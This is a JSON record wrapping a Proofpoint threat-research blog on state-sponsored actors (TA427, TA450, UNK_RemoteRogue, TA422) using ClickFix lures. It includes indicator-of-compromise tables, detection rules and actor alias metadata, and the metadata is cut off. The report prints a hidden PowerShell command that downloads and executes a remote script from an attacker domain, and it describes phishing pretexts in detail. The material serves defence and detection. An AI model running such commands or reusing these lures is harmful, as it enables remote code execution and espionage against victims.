{
	"id": "bdf3ff3c-1a4a-469d-bcdb-1f9efa4e1056",
	"created_at": "2026-04-06T00:07:40.344901Z",
	"updated_at": "2026-04-10T03:37:49.997669Z",
	"deleted_at": null,
	"sha1_hash": "ce1c9aed40cb251890cac05f24f7bff10ee03d94",
	"title": "Around the World in 90 Days: State-Sponsored Actors Try ClickFix | Proofpoint US",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2875130,
	"plain_text": "Around the World in 90 Days: State-Sponsored Actors Try ClickFix |\r\nProofpoint US\r\nPublished: 2025-04-16 · Archived: 2026-04-05 14:44:22 UTC\r\nApril 17, 2025 Saher Naumaan, Mark Kelly, Greg Lesnewich, Josh Miller, and The Proofpoint Threat Research Team\r\nKey Findings\r\nWhile primarily a technique affiliated with cybercriminal actors, Proofpoint researchers discovered state-sponsored\r\nactors in multiple campaigns using the ClickFix social engineering technique for the first time.\r\nOver only a three-month period from late 2024 through the beginning of 2025, groups from North Korea, Iran, and\r\nRussia were all seen using the ClickFix technique in their routine activity.\r\nThe incorporation of ClickFix is not revolutionizing the campaigns carried out by TA427, TA450,\r\nUNK_RemoteRogue, and TA422 but instead is replacing the installation and execution stages in existing infection\r\nchains.\r\nWhile currently limited to a few state-sponsored groups, the increasing popularity of ClickFix in cybercrime over the\r\nlast year as well as in espionage campaigns in recent months suggests the technique will likely become more widely\r\ntested or adopted by state-sponsored actors.\r\nOverview\r\nA major trend in the threat landscape is the fluidity of tactics, techniques, and procedures (TTPs). Threat actors share, copy,\r\nsteal, adopt, and test TTPs from publicly exposed tradecraft or interaction with other threat groups. Specifically, state-sponsored actors have often leveraged techniques first developed and deployed by cybercriminal actors. For example, North\r\nKorean threat actors copying techniques from cybercrime to steal cryptocurrency on behalf of the government, or Chinese\r\ngroups mimicking cybercrime infection chains to deliver malware in espionage operations.\r\nThe most recent example of this trend is ClickFix. 
ClickFix is a social engineering technique that uses dialogue boxes with\r\ninstructions to copy, paste, and run malicious commands on the target’s machine. This creative technique not only employs\r\nfake error messages as the problem, but also an authoritative alert and instructions supposedly coming from the operating\r\nsystem as a solution. Primarily observed in cybercrime activity, the ClickFix technique was first seen in early March 2024\r\ndeployed by initial access broker TA571 and the ClearFake cluster, after which it flooded the threat landscape.\r\nOne year later, at least four state-sponsored threat actors have since experimented with variations of this technique as part of\r\ntheir business-as-usual espionage campaigns. Over roughly a three-month period from October 2024 to January 2025, threat\r\nactors originating from three distinct countries (North Korea, Iran, and Russia) incorporated ClickFix as a stage in their\r\ninfection chains.\r\nNorth Korea: TA427\r\nIn January and February 2025, Proofpoint first observed TA427 operators targeting individuals in fewer than five\r\norganizations in the think tank sector with a new infection chain using the ClickFix technique. TA427 overlaps with activity\r\nthird parties refer to as Kimsuky or Emerald Sleet.\r\nTA427 made initial contact with the target through a meeting request from a spoofed sender delivered to traditional TA427\r\ntargets working on North Korean affairs. After a brief conversation to engage the target and build trust, as is often seen in\r\nTA427 activity, the attackers directed the target to an attacker-controlled site where they convinced the target to run a\r\nPowerShell command. 
While one chain failed to retrieve further payloads, another instance of this campaign included a\r\nmultistage chain that executed PowerShell, VBS, and batch scripts, which eventually led to a final payload – QuasarRAT, a\r\ncommodity malware also seen in cybercriminal activity.\r\nhttps://www.proofpoint.com/us/blog/threat-insight/around-world-90-days-state-sponsored-actors-try-clickfix\r\nPage 1 of 18\n\nAn overview of the infection chain is shown in the graphic below.\r\nTA427 ClickFix infection chains (chain 1 - solid line; chain 2 – dotted line).\r\nDelivery\r\nIn February 2025, TA427 operators masqueraded as a Japanese diplomat and sent an email to the target asking to arrange a\r\nmeeting with Ambassador Shigeo Yamada, the Japanese ambassador to the US, at the embassy in Washington, DC. \r\nInitial TA427 conversation starter with benign attachment.\r\nThe email contained a benign attachment with the filename “Letter from Ambassador Cho Hyun-Dong.pdf” and the subject\r\nline “[Japanese Embassy] Meeting Request”. 
Further engagement involved communication with both the target’s personal\r\nand professional email accounts and prompted the attackers to follow up with a malicious email.\r\nTA427 reply with malicious attachment.\r\nThe email response from the attackers contained a PDF attachment that used the target's name in the title, and the PDF\r\nincluded a link to a landing page using a subdomain of a dynamic DNS domain claiming to be a secure drive.\r\nPDF attachment lure containing malicious link.\r\nThe landing page hosted a fake PDF file called Questionnaire.pdf.\r\nLanding page hosting fake PDF.\r\nIf the target attempted to download the fake PDF, they would be redirected to another page. A pop-up alert told the user to\r\nregister to see the documents.\r\n“Register” dialogue box.\r\nWhen the user clicked the register button, another pop-up appeared prompting the user to enter a code along with\r\ninstructions on how to register, as shown below.\r\nDialogue box with code and instructions to run PowerShell commands.\r\nThe user must manually copy and paste the register code containing the PowerShell command and run it in a terminal, as\r\nshown below.\r\n powershell -windowstyle hidden -Command iwr \"hxxps://securedrive.fin-tech[.]com/docs/en/t.vmd\" -OutFile \"$env:TEMP\\p\"; $c=Get-Content -Path \"$env:TEMP\\p\" -Raw; iex $c;\r\n 3Z5TY-76FR3-9G87H-7ZC56\r\nThe ClickFix PowerShell command fetches and executes a second remotely hosted PowerShell command, which displays\r\nthe decoy PDF referenced earlier in the chain (Questionnaire.pdf) to the user, as shown below. 
The document claimed to be\r\nfrom the Ministry of Foreign Affairs in Japan and contained questions regarding nuclear proliferation and policy in\r\nNortheast Asia.\r\nDecoy lure Questionnaire.pdf.\r\nThe second PowerShell script created a VBS script called temp.vbs that is run every 19 minutes by a scheduled task called\r\nUpdate-out-of-date-20240324001883765674. A second scheduled task called Update-out-of-date-20240324001883765675\r\nwas also created to run a VBS script every 20 minutes; however, this VBS script did not exist, and the purpose of this task is\r\nunclear.\r\nWhile this chain did not execute further past running a scheduled task, another chain seen in January 2025 followed a very\r\nsimilar path but with additional steps. In this case, the first scheduled task ultimately downloaded two batch scripts, which\r\ncreated and decoded two new PowerShell scripts and an obfuscated payload.\r\nThe second batch script executed the newly created PowerShell scripts to ultimately decode a Base64 and XOR-encoded\r\nQuasarRAT payload that communicated with the command and control (C2) IP address 38.180.157[.]197 over port 80.\r\nWhile TA427 has adopted new techniques in its infection chain, the group has been using QuasarRAT – a publicly available\r\ntool – for at least four years. Proofpoint attributes this activity to TA427 based on infrastructure overlap, TTPs, and malware.\r\nNetwork Infrastructure Analysis\r\nFurther investigation into the delivery infrastructure found several other servers and staging URLs with largely similar\r\nthemes. Proofpoint researchers also observed TA427 use Japanese, Korean, and English-language content in this campaign,\r\ncustomized to align with the spoofed senders. 
An example of another secure drive spoof in Korean is shown below.\r\nFake secure drive example from mid-January 2025.\r\nTA427 used Dynamic DNS (DDNS) services for this campaign, primarily hosted on servers located in South Korea that\r\nhave likely been compromised. In all cases the attackers used either the FreeDNS or No-IP DDNS services and spoofed a\r\nsecure drive or account profile as subdomains. All the infrastructure related to this activity was set up no earlier than January\r\n2025.\r\nIn the same month, Microsoft observed a variation of TA427’s ClickFix infection chain, similarly with a URL to register a\r\ndevice and run PowerShell commands. In this variation, the code installed a browser-based remote desktop tool and\r\ndownloaded a certificate and PIN used to register the victim device. It is likely that TA427 made multiple attempts to use the\r\nClickFix technique with different versions over several weeks, before returning to tried-and-tested techniques shortly after.\r\nIran: TA450\r\nOn 13 and 14 November 2024, TA450 used an attacker-controlled email address support@microsoftonlines[.]com to send an\r\nEnglish-language phish to targets in at least 39 organizations in the Middle East. TA450 overlaps with groups third parties\r\nrefer to as MuddyWater and Mango Sandstorm. The email masqueraded as a security update from Microsoft with the subject\r\nline: “Urgent Security Update Required – Immediate Action Needed” to convince individuals to execute a series of steps to\r\naddress a security vulnerability.\r\nThe attackers deployed the ClickFix technique by persuading the target to first run PowerShell with administrator privileges,\r\nthen copy and run a command contained in the email body. 
The command was responsible for installing remote management\r\nand monitoring (RMM) software – in this case, Level – after which TA450 operators will abuse the RMM tool to conduct\r\nespionage and exfiltrate data from the target’s machine.\r\nThe infection chain can be seen below:\r\nTA450 ClickFix infection chain.\r\nOn 15 November, the Israeli National Cyber Directorate reported that the command would load a specific RMM tool called\r\nLevel. While Proofpoint has observed TA450 historically using several RMM tools, such as Atera, PDQ Connect,\r\nScreenConnect, and SimpleHelp as a foothold to conduct intrusions, this was the first sighting of Level in Proofpoint data.\r\nTA450 phish (INCD).\r\nThis attribution is based on known TA450 TTPs, campaign targeting, and malware analysis. However, while typical TA450\r\nRMM campaigns have consistently targeted organizations in Israel, the group’s ClickFix campaign was broader in scope.\r\nAs shown in the heatmap below, Proofpoint researchers observed TA450 targets distributed primarily across the Middle East\r\nwith an emphasis on the UAE and Saudi Arabia, but with global targets as well.\r\nTA450 ClickFix campaign target heatmap.\r\nThe targets spanned several sectors, but finance and government organizations were among the more popular targets.\r\nTA450 ClickFix target breakdown by sector.\r\nAt the time of writing, no further instances of TA450 using ClickFix have been observed since the initial sighting in\r\nNovember 2024. However, TA450 has remained consistent in its typical targeting of Israel and tactics using RMMs in\r\nsubsequent months.\r\nRussia: UNK_RemoteRogue and TA422\r\nNorth Korean and Iranian state actors aren’t the only ones experimenting with ClickFix. 
A suspected Russian group tracked\r\nas UNK_RemoteRogue was also seen using it at the end of 2024 in the following infection chain.\r\nUNK_RemoteRogue ClickFix infection chain.\r\nBeginning on 9 December 2024, a targeted campaign used compromised infrastructure to send 10 messages to individuals in\r\ntwo organizations associated with a major arms manufacturer in the defense industry. The messages did not contain a subject\r\nline and abused various likely compromised Zimbra servers as intermediate sending infrastructure, which then populated the\r\n‘From’ fields. The emails contained a malicious link that spoofed Microsoft Office with the title “RSVP Office -\r\nСтворюйте, редагуйте документи та діліться ними в Інтернеті”:\r\n         hxxps://office[.]rsvp/fin?document=2hg6739jhngdf7892w0p93u4yh5g\r\nThe link description translated to “RSVP Office - Create, edit and share documents online.” If the target visited the link, it\r\ndisplayed HTML that spoofed a Microsoft Word document with ClickFix-style instructions in Russian to copy code from the\r\nbrowser into their terminal. The webpage included a link to a YouTube video tutorial on how to run PowerShell.\r\nUNK_RemoteRogue ClickFix landing page spoofing Microsoft Word.\r\nThe commands pasted in the terminal ran malicious JavaScript that then executed PowerShell code linked to the Empire C2\r\nframework.\r\nProofpoint observed UNK_RemoteRogue’s use of ClickFix only once, after which the group returned to its traditional\r\ncampaigns, which display many of the same features, including the use of compromised intermediate mailservers, the same\r\nupstream sending host, and highly similar targeting. 
In January 2025, the domain office[.]rsvp began resolving to\r\n5.231.4[.]94, which was also hosting ukrtelecom[.]com and mail.ukrtelecom[.]eu. These domains were seen in further\r\nUNK_RemoteRogue phishing activity the same month. Research from DomainTools highlighted additional\r\nUNK_RemoteRogue infrastructure.\r\nOn 28 January, UNK_RemoteRogue returned in a campaign that showed the group’s consistent abuse of compromised\r\nmailservers as intermediate senders via 80.66.66[.]197 as the upstream concentrator. The group forged the ‘From’ header in\r\nthe targeted emails to spoof Ukrainian entities as well as telecommunications and defence companies, and the messages\r\ndelivered RDP files. Later campaigns in February 2025 used a password-protected link to facilitate delivery of the RDP\r\nfiles.\r\nUNK_RemoteRogue phishing email with RDP attachment in January 2025.\r\nIf the targets’ hosts allow for remote connections, the downloaded file will create an RDP connection that includes\r\nconnection of all attached drives and redirect clipboard data and web authentication attempts to a remote host. In Proofpoint\r\nThreat Research’s investigation of cloud data, the 80.66.66[.]197 IP was observed attempting to log in to Office 365\r\nExchange accounts of users working in individual US state governments in late February 2025.\r\nAnother sighting of ClickFix came from an established Russian group on 17 October 2024. CERT-UA observed TA422 send\r\nphishing emails containing a link that mimicked a Google spreadsheet. TA422 overlaps with activity third parties call Sofacy\r\nand APT28. This led to a reCAPTCHA prompt, which when clicked, would copy and paste a PowerShell command along\r\nwith displaying a further dialogue box with instructions to run the command. 
The PowerShell creates an SSH tunnel and\r\nruns Metasploit.\r\nConclusion\r\nAs with other criminal – and often creative and novel – techniques, state-sponsored actors observe and emulate other groups\r\n(sometimes with a convenient byproduct of muddling attribution). Multiple examples of state-sponsored actors using\r\nClickFix have shown not only the technique’s popularity among state actors, but also its use by various countries within\r\nweeks of one another.\r\nThe timeline below shows each ClickFix sighting among the typical cadence of state-sponsored actors’ campaigns. In most\r\ncases, the groups returned to standard campaigns after their ClickFix campaigns. TA422 is an exception as no further\r\ncampaigns were observed; however, this is likely due to Proofpoint visibility rather than a lack of subsequent activity.\r\nTimeline of standard campaigns and ClickFix sightings (Jul 2024 – Mar 2025).\r\nWhile several ClickFix sightings were observed, no actor has shown repeated use of the technique in the weeks following. It\r\nis unclear why each actor was only observed with one ClickFix campaign or wave while other typical campaigns continue in\r\nparallel. We initially hypothesized that this may be due to the technique’s early days among state-sponsored actors as they\r\ntrial it, or perhaps the technique did not have as much success as others for machine compromise. However, recent\r\nProofpoint investigations found that as the group continued with its typical campaigns, TA427 returned to ClickFix with a\r\nslightly varied infection chain in April, over two months after the initial sightings. This likely indicates that TA427 is further\r\ndeveloping how it uses the ClickFix technique in its operations, and more sightings are likely in the coming months.\r\nAlthough not a persistently used technique, it is likely that more threat actors from North Korea, Iran, and Russia have also\r\ntried and tested ClickFix or may in the near future. 
Given the technique’s trajectory around the world, there is a conspicuous\r\nabsence in the use of ClickFix by a Chinese state-sponsored actor in Proofpoint investigations. However, this is likely due to\r\nvisibility, and there is a high probability that a China-nexus group has also experimented with ClickFix, given its appearance\r\nacross many actors’ campaigns in a short period of time.\r\nIndicators of compromise\r\nCertain PDF hashes have been excluded from the indicator list because they were personalized to the target.\r\nTA427 Network Indicators\r\nIndicator | Type | Description | First Seen\r\nyasuyuki.ebata21@proton[.]me | Email address | Sender email | February 2025\r\neunsoolim29@gmail[.]com | Email address | Sender email | January 2025\r\n115.92.4[.]123 | IP | Likely legitimate but compromised server | January 2025\r\n121.179.161[.]230 | IP | Likely legitimate but compromised server | January 2025\r\n121.179.161[.]231 | IP | Likely legitimate but compromised server | January 2025\r\n172.86.111[.]75 | IP | Likely legitimate but compromised server | January 2025\r\n210.179.30[.]213 | IP | Likely legitimate but compromised server | January 2025\r\n221.144.93[.]250 | IP | Likely legitimate but compromised server | January 2025\r\n118.194.228[.]184 | IP | Likely legitimate but compromised server | January 2025\r\n14.34.85[.]86 | IP | Likely legitimate but compromised server | January 2025\r\n38.180.157[.]197 | IP | QuasarRAT C2 | January 2025\r\nsecuredrive.networkguru[.]com | Domain | Payload delivery | January 2025\r\nsecuredrive.servehttp[.]com | Domain | Payload delivery | January 2025\r\nsecuredrive-mofa.servehttp[.]com | Domain | Payload delivery | January 2025\r\nlogin-accounts.servehttp[.]com | Domain | Payload delivery | January 2025\r\naccounts-myservice.servepics[.]com | Domain | Payload delivery | January 2025\r\nsecuredrive.netsecgroup[.]com | Domain | Payload delivery | January 2025\r\nsecuredrive.privatedns[.]org | Domain | Payload delivery | January 2025\r\ndrive.us-dos.securitel[.]com | Domain | Payload delivery | March 2025\r\nsecuredrive.fin-tech[.]com | Domain | Payload delivery | January 2025\r\nsecuredrive.opticalize[.]com | Domain | Payload delivery | January 2025\r\nsecuredrive.dob[.]jp | Domain | Payload delivery | February 2025\r\naccounts-porfile.serveirc[.]com | Domain | Payload delivery | February 2025\r\naccount-profile.servepics[.]com | Domain | Payload delivery | February 2025\r\nfreedrive.servehttp[.]com | Domain | Payload delivery | March 2025\r\ne-securedrive.mofa.mtomtech.co[.]kr | Domain | Payload delivery | April 2025\r\nsecuredrive.root[.]sx | Domain | Payload delivery | February 2025\r\nmyaccounts-profile.servehttp[.]com | Domain | Payload delivery | April 2025\r\nundocs.myvnc[.]com | Domain | Payload delivery | April 2025\r\nundocs.servehttp[.]com | Domain | Payload delivery | April 2025\r\nraedom[.]store | Domain | C2 | January 2025\r\nhxxps://securedrive.root[.]sx:8443/us.emb-japan.go.jp/doc/eh | URL | Landing page | February 2025\r\nhxxps://securedrive[.]root[.]sx:8443/us.emb-japan.go.jp/doc/eh/alert | URL | ClickFix pop-up | February 2025\r\nhxxps://securedrive[.]root[.]sx:8443/us.emb-japan.go.jp/doc/eh/register | URL | ClickFix pop-up | February 2025\r\nhxxps://securedrive.fin-tech[.]com/docs/en/ | URL | Landing page | January 2025\r\nhxxps://securedrive.fin-tech[.]com/docs/en/alert | URL | ClickFix pop-up | January 2025\r\nhxxps://securedrive.fin-tech[.]com/docs/en/register | URL | ClickFix pop-up | January 2025\r\nhxxps://securedrive.fin-tech[.]com/docs/en/t.vmd | URL | Hosting URL for PowerShell | January 2025\r\nhxxps://securedrive.fin-tech[.]com/docs/en/src/pdf_0.pdf | URL | Hosting URL for decoy PDF | January 2025\r\nhxxps://securedrive.fin-tech[.]com/docs/en/src/resp.php | URL | Redirect URL | January 2025\r\nhxxps://raedom[.]store/[REDACTED]/demo.php?ccs=cin | URL | VBS script C2 | January 2025\r\nhxxps://bit-albania[.]com/[REDACTED]/demo.php?ccs=cin | URL | VBS script C2 (compromised) | February 2025\r\nTA427 Malware Indicators\r\nIndicator | Type | Filename | Description | First Seen\r\n06816634fb019b6ed276d36f414f3b36f99b845ddd1015c2b84a34e0b8d7f083 | SHA256 | Letter from Ambassador Cho Hyun-Dong.pdf | Lure document | January 2025\r\n0ff9c4bba39d6f363b9efdfa6b54127925b8c606ecef83a716a97576e288f6dd | SHA256 | temp.vbs | Stager script | January 2025\r\n18ee1393fc2b2c1d56d4d8f94efad583841cdf8766adb95d7f37299692d60d7d | SHA256 | temp.vbs | Stager script | February 2025\r\ne410ffadb3f5b6ca82cece8bce4fb378a43c507e3ba127ef669dbb84e3c73e61 | SHA256 | 1.bat | Loader | January 2025\r\n78aa2335d3e656256c50f1f2c544b32713790857998068a5fa6dec1fb89aa411 | SHA256 | 2.bat | Loader | January 2025\r\n07a45c7a436258aa81ed2e770a233350784f5b05538da8a1d51d03c55d9c0875 | SHA256 | adobe.ps1 | Dropper | January 2025\r\nf9536b1d798bee3af85b9700684b41da67ff9fed79aae018a47af085f75c9e3e | SHA256 | mer.ps1 | Dropper | January 2025\r\n85db55aab78103f7c2d536ce79e923c5fd9af14a2683f8bf290993828bddeb50 | SHA256 | Unknown | QuasarRAT | January 2025\r\nTA450 Network Indicators\r\nIndicator | Type | Description | First Seen\r\nsupport@microsoftonlines[.]com | Email address | Sender email | November 2024\r\nmicrosoftonlines[.]com | Domain | Phishing | November 2024\r\nUNK_RemoteRogue Network Indicators\r\nIndicator | Type | Description | First Seen\r\noffice[.]rsvp | Domain | Email delivery | December 2024\r\nmail.ukrtelecom[.]eu | Domain | Phishing | January 2025\r\nukrtelecom[.]eu | Domain | Phishing | January 2025\r\nukrtelecom[.]com | Domain | Phishing | January 2025\r\nhxxps://office[.]rsvp/fin?document=2hg6739jhngdf7892w0p93u4yh5g | URL | Landing page | December 2024\r\n80.66.66[.]197 | IP | Email delivery | December 2024\r\n5.231.4[.]94 | IP | Email delivery | January 2025\r\nUNK_RemoteRogue Malware Indicators\r\nIndicator | Type | Description | First Seen\r\nbfb11abb82ab4c788156df862a5cf4fa085f1ac3203df7a46251373d55cc587c | SHA256 | HTML landing page | December 2024\r\n8a8c57eedca1bd03308198a87cae7977d3c385f240c5c62ac7c602126a1a312f | SHA256 | JavaScript executes PowerShell | December 2024\r\nET Rules\r\n2061585 - ET PHISHING Observed DNS Query to TA450 Domain (microsoftonlines .com)\r\n2061586 - ET PHISHING Observed TA450 Domain in TLS SNI (microsoftonlines .com in TLS SNI)\r\n2061587 - ET PHISHING Observed DNS Query to UNK_RemoteRogue Domain (office .rsvp)\r\n2061588 - ET PHISHING Observed DNS Query to UNK_RemoteRogue Domain (ukrtelecom .com)\r\n2061589 - ET PHISHING Observed DNS Query to UNK_RemoteRogue Domain (ukrtelecom .eu)\r\n2061590 - ET PHISHING Observed UNK_RemoteRogue Domain in TLS SNI (office .rsvp in TLS SNI)\r\n2061591 - ET PHISHING Observed UNK_RemoteRogue Domain in TLS SNI (ukrtelecom .com in TLS SNI)\r\n2061592 - ET PHISHING Observed UNK_RemoteRogue Domain in TLS SNI (ukrtelecom .eu in TLS SNI)\r\n2061593 - ET MALWARE Observed DNS Query to TA427 Domain (raedom .store)\r\n2061594 - ET MALWARE Observed TA427 Domain in TLS SNI (raedom .store in TLS SNI)\r\nSource: https://www.proofpoint.com/us/blog/threat-insight/around-world-90-days-state-sponsored-actors-try-clickfix",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"Malpedia"
	],
	"references": [
		"https://www.proofpoint.com/us/blog/threat-insight/around-world-90-days-state-sponsored-actors-try-clickfix"
	],
	"report_names": [
		"around-world-90-days-state-sponsored-actors-try-clickfix"
	],
	"threat_actors": [
		{
			"id": "02e1c2df-8abd-49b1-91d1-61bc733cf96b",
			"created_at": "2022-10-25T15:50:23.308924Z",
			"updated_at": "2026-04-10T02:00:05.298591Z",
			"deleted_at": null,
			"main_name": "MuddyWater",
			"aliases": [
				"MuddyWater",
				"Earth Vetala",
				"Static Kitten",
				"Seedworm",
				"TEMP.Zagros",
				"Mango Sandstorm",
				"TA450"
			],
			"source_name": "MITRE:MuddyWater",
			"tools": [
				"STARWHALE",
				"POWERSTATS",
				"Out1",
				"PowerSploit",
				"Small Sieve",
				"Mori",
				"Mimikatz",
				"LaZagne",
				"PowGoop",
				"CrackMapExec",
				"ConnectWise",
				"SHARPSTATS",
				"RemoteUtilities",
				"Koadic"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "2ed8d590-defa-4873-b2de-b75c9b30931e",
			"created_at": "2023-01-06T13:46:38.730137Z",
			"updated_at": "2026-04-10T02:00:03.08136Z",
			"deleted_at": null,
			"main_name": "MuddyWater",
			"aliases": [
				"TEMP.Zagros",
				"Seedworm",
				"COBALT ULSTER",
				"G0069",
				"ATK51",
				"Mango Sandstorm",
				"TA450",
				"Static Kitten",
				"Boggy Serpens",
				"Earth Vetala"
			],
			"source_name": "MISPGALAXY:MuddyWater",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "191d7f9a-8c3c-442a-9f13-debe259d4cc2",
			"created_at": "2022-10-25T15:50:23.280374Z",
			"updated_at": "2026-04-10T02:00:05.305572Z",
			"deleted_at": null,
			"main_name": "Kimsuky",
			"aliases": [
				"Kimsuky",
				"Black Banshee",
				"Velvet Chollima",
				"Emerald Sleet",
				"THALLIUM",
				"APT43",
				"TA427",
				"Springtail"
			],
			"source_name": "MITRE:Kimsuky",
			"tools": [
				"Troll Stealer",
				"schtasks",
				"Amadey",
				"GoBear",
				"Brave Prince",
				"CSPY Downloader",
				"gh0st RAT",
				"AppleSeed",
				"Gomir",
				"NOKKI",
				"QuasarRAT",
				"Gold Dragon",
				"PsExec",
				"KGH_SPY",
				"Mimikatz",
				"BabyShark",
				"TRANSLATEXT"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "760f2827-1718-4eed-8234-4027c1346145",
			"created_at": "2023-01-06T13:46:38.670947Z",
			"updated_at": "2026-04-10T02:00:03.062424Z",
			"deleted_at": null,
			"main_name": "Kimsuky",
			"aliases": [
				"G0086",
				"Emerald Sleet",
				"THALLIUM",
				"Springtail",
				"Sparkling Pisces",
				"Thallium",
				"Operation Stolen Pencil",
				"APT43",
				"Velvet Chollima",
				"Black Banshee"
			],
			"source_name": "MISPGALAXY:Kimsuky",
			"tools": [
				"xrat",
				"QUASARRAT",
				"RDP Wrapper",
				"TightVNC",
				"BabyShark",
				"RevClient"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "699cffa0-44cd-4c73-b83f-40dfd99097fc",
			"created_at": "2025-05-29T02:00:03.215951Z",
			"updated_at": "2026-04-10T02:00:03.868306Z",
			"deleted_at": null,
			"main_name": "UNK_RemoteRogue",
			"aliases": [],
			"source_name": "MISPGALAXY:UNK_RemoteRogue",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "156b3bc5-14b7-48e1-b19d-23aa17492621",
			"created_at": "2025-08-07T02:03:24.793494Z",
			"updated_at": "2026-04-10T02:00:03.634641Z",
			"deleted_at": null,
			"main_name": "COBALT ULSTER",
			"aliases": [
				"Boggy Serpens ",
				"ENT-11 ",
				"Earth Vetala ",
				"ITG17 ",
				"MERCURY ",
				"Mango Sandstorm ",
				"MuddyWater ",
				"STAC 1171 ",
				"Seedworm ",
				"Static Kitten ",
				"TA450 ",
				"TEMP.Zagros ",
				"UNC3313 ",
				"Yellow Nix "
			],
			"source_name": "Secureworks:COBALT ULSTER",
			"tools": [
				"CrackMapExec",
				"Empire",
				"FORELORD",
				"Koadic",
				"LaZagne",
				"Metasploit",
				"Mimikatz",
				"Plink",
				"PowerStats"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "c8bf82a7-6887-4d46-ad70-4498b67d4c1d",
			"created_at": "2025-08-07T02:03:25.101147Z",
			"updated_at": "2026-04-10T02:00:03.846812Z",
			"deleted_at": null,
			"main_name": "NICKEL KIMBALL",
			"aliases": [
				"APT43 ",
				"ARCHIPELAGO ",
				"Black Banshee ",
				"Crooked Pisces ",
				"Emerald Sleet ",
				"ITG16 ",
				"Kimsuky ",
				"Larva-24005 ",
				"Opal Sleet ",
				"Ruby Sleet ",
				"SharpTongue ",
				"Sparking Pisces ",
				"Springtail ",
				"TA406 ",
				"TA427 ",
				"THALLIUM ",
				"UAT-5394 ",
				"Velvet Chollima "
			],
			"source_name": "Secureworks:NICKEL KIMBALL",
			"tools": [
				"BabyShark",
				"FastFire",
				"FastSpy",
				"FireViewer",
				"Konni"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "7183913d-9a43-4362-96e1-9af522b6ab84",
			"created_at": "2024-06-19T02:00:04.377344Z",
			"updated_at": "2026-04-10T02:00:03.653777Z",
			"deleted_at": null,
			"main_name": "TA571",
			"aliases": [],
			"source_name": "MISPGALAXY:TA571",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "730dfa6e-572d-473c-9267-ea1597d1a42b",
			"created_at": "2023-01-06T13:46:38.389985Z",
			"updated_at": "2026-04-10T02:00:02.954105Z",
			"deleted_at": null,
			"main_name": "APT28",
			"aliases": [
				"Pawn Storm",
				"ATK5",
				"Fighting Ursa",
				"Blue Athena",
				"TA422",
				"T-APT-12",
				"APT-C-20",
				"UAC-0001",
				"IRON TWILIGHT",
				"SIG40",
				"UAC-0028",
				"Sofacy",
				"BlueDelta",
				"Fancy Bear",
				"GruesomeLarch",
				"Group 74",
				"ITG05",
				"FROZENLAKE",
				"Forest Blizzard",
				"FANCY BEAR",
				"Sednit",
				"SNAKEMACKEREL",
				"Tsar Team",
				"TG-4127",
				"STRONTIUM",
				"Grizzly Steppe",
				"G0007"
			],
			"source_name": "MISPGALAXY:APT28",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "3c430d71-ab2b-4588-820a-42dd6cfc39fb",
			"created_at": "2022-10-25T16:07:23.880522Z",
			"updated_at": "2026-04-10T02:00:04.775749Z",
			"deleted_at": null,
			"main_name": "MuddyWater",
			"aliases": [
				"ATK 51",
				"Boggy Serpens",
				"Cobalt Ulster",
				"G0069",
				"ITG17",
				"Mango Sandstorm",
				"MuddyWater",
				"Operation BlackWater",
				"Operation Earth Vetala",
				"Operation Quicksand",
				"Seedworm",
				"Static Kitten",
				"T-APT-14",
				"TA450",
				"TEMP.Zagros",
				"Yellow Nix"
			],
			"source_name": "ETDA:MuddyWater",
			"tools": [
				"Agentemis",
				"BugSleep",
				"CLOUDSTATS",
				"ChromeCookiesView",
				"Cobalt Strike",
				"CobaltStrike",
				"CrackMapExec",
				"DCHSpy",
				"DELPHSTATS",
				"EmPyre",
				"EmpireProject",
				"FruityC2",
				"Koadic",
				"LOLBAS",
				"LOLBins",
				"LaZagne",
				"Living off the Land",
				"MZCookiesView",
				"Meterpreter",
				"Mimikatz",
				"MuddyC2Go",
				"MuddyRot",
				"Mudwater",
				"POWERSTATS",
				"PRB-Backdoor",
				"PhonyC2",
				"PowGoop",
				"PowerShell Empire",
				"PowerSploit",
				"Powermud",
				"QUADAGENT",
				"SHARPSTATS",
				"SSF",
				"Secure Socket Funneling",
				"Shootback",
				"Smbmap",
				"Valyria",
				"chrome-passwords",
				"cobeacon",
				"prb_backdoor"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "e3767160-695d-4360-8b2e-d5274db3f7cd",
			"created_at": "2022-10-25T16:47:55.914348Z",
			"updated_at": "2026-04-10T02:00:03.610018Z",
			"deleted_at": null,
			"main_name": "IRON TWILIGHT",
			"aliases": [
				"APT28 ",
				"ATK5 ",
				"Blue Athena ",
				"BlueDelta ",
				"FROZENLAKE ",
				"Fancy Bear ",
				"Fighting Ursa ",
				"Forest Blizzard ",
				"GRAPHITE ",
				"Group 74 ",
				"PawnStorm ",
				"STRONTIUM ",
				"Sednit ",
				"Snakemackerel ",
				"Sofacy ",
				"TA422 ",
				"TG-4127 ",
				"Tsar Team ",
				"UAC-0001 "
			],
			"source_name": "Secureworks:IRON TWILIGHT",
			"tools": [
				"Downdelph",
				"EVILTOSS",
				"SEDUPLOADER",
				"SHARPFRONT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "ae320ed7-9a63-42ed-944b-44ada7313495",
			"created_at": "2022-10-25T15:50:23.671663Z",
			"updated_at": "2026-04-10T02:00:05.283292Z",
			"deleted_at": null,
			"main_name": "APT28",
			"aliases": [
				"APT28",
				"IRON TWILIGHT",
				"SNAKEMACKEREL",
				"Group 74",
				"Sednit",
				"Sofacy",
				"Pawn Storm",
				"Fancy Bear",
				"STRONTIUM",
				"Tsar Team",
				"Threat Group-4127",
				"TG-4127",
				"Forest Blizzard",
				"FROZENLAKE",
				"GruesomeLarch"
			],
			"source_name": "MITRE:APT28",
			"tools": [
				"Wevtutil",
				"certutil",
